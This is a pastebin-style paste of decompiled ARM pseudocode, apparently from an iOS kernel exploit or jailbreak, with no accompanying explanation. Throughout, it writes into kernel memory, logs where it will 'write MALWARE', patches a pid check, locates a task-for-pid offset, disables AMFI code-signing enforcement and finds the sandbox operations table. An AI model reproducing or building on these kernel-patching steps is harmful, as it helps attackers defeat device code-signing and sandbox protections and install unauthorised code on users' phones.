From Gruff Crocodile, 3 Years ago, written in Plain Text.
Embed
  1.  _logToFile("where we will write MALWARE to: 0x%08x\n", r10, 0x8, sp + 0x34);
  2.     vm_write(*r8, stack[2019], sp + 0x94, 0x4);
  3.     vm_write(*r8, stack[2019] + 0x4, sp + 0x94, 0x4);
  4.     r1 = r10;
  5.     if (vm_write(r11, r1, 0x4fe83, 0x10) != 0x0) {
  6.             _logToFile("Hacked FAILED\n", r1, 0x4fe83, 0x10);
  7.     }
  8.     r8 = 0x55dd0;
  9.     vm_write(r11, r10 + 0x10, sp + 0x34, 0x8);
  10.     r5 = [[NSNotificationCenter defaultCenter] retain];
  11.     asm { strd       r1, r0, [sp, #0xb0 + var_88] };
  12.     r4 = [objc_msgSend(@class(NSDictionary), stack[2008]) retain];
  13.     r11 = 0x0;
  14.     objc_msgSend(r5, stack[2006]);
  15.     [r4 release];
  16.     [r5 release];
  17.     r10 = stack[2010];
  18.     r6 = stack[2009];
  19.     r5 = stack[2005];
  20.     _find_tfp_off(r10, r6, r5, sp + 0x24);
  21.     r1 = stack[2011];
  22.     r2 = sp + 0x94;
  23.     asm { strd       fp, fp, [sp, #0xb0 + var_20] };
  24.     vm_read_overwrite(*r8, r1, 0x4, sp + 0x90, r2);
  25.     r4 = sp + 0x94;
  26.     vm_write(*r8, stack[2011], r4, 0x4);
  27.     _logToFile("patched pid_check\n", stack[2011], r4, 0x4);
  28.     r0 = _find_cs_enforcement_disable_amfi();
  29.     asm { strd       fp, fp, [sp, #0xb0 + var_20] };
  30.     vm_read_overwrite(*r8, r0 + r10, 0x4, sp + 0x90, r4);
  31.     vm_write(*r8, r0 + r10, sp + 0x94, 0x4);
  32.     _find_sbops(r10, r6, r5, sp + 0x90);
  33.     _logToFile("Found sbops 0x%08x\n", stack[2038], r5, sp + 0x90);